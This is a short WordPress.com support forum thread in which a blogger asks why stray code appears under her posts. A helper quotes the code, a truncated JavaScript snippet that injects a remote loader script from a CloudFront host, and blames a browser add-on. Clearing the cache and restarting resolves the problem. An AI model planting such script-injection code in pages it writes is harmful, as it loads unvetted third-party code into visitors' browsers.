Loose code showing up on published posts

  • Author
    Posts
  • #967436

    sarahdea
    Member

    Every time I post an entry, random loose code shows up on the bottom of my post once I publish it. When I try to edit the entry afterwards and delete the code, it still remains. You can see examples of this in my last few entries. Please help.
    Blog url: http://sarahdea.wordpress.com/

    The blog I need help with is sarahdea.wordpress.com.

    #967655

    timethief
    Member

    This is not coming from wordpress.com:

    // -1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};
    // ]]>

    Disable all your browser add-ons and extensions, clear your browser cache and cookies. To locate the “culprit” enable each add-on one at a time.

    #967671

    sarahdea
    Member

    Hello, thanks for your reply. I cleared my cache and cookies and removed all the widgets and tried to go back into the entries to delete the code but it remains :( Please advise

    #967673

    sarahdea
    Member

    Nevermind, I just restarted my browser after clearing everything and it seems to have done the job. Thanks for your help!

The topic ‘Loose code showing up on published posts’ is closed to new replies.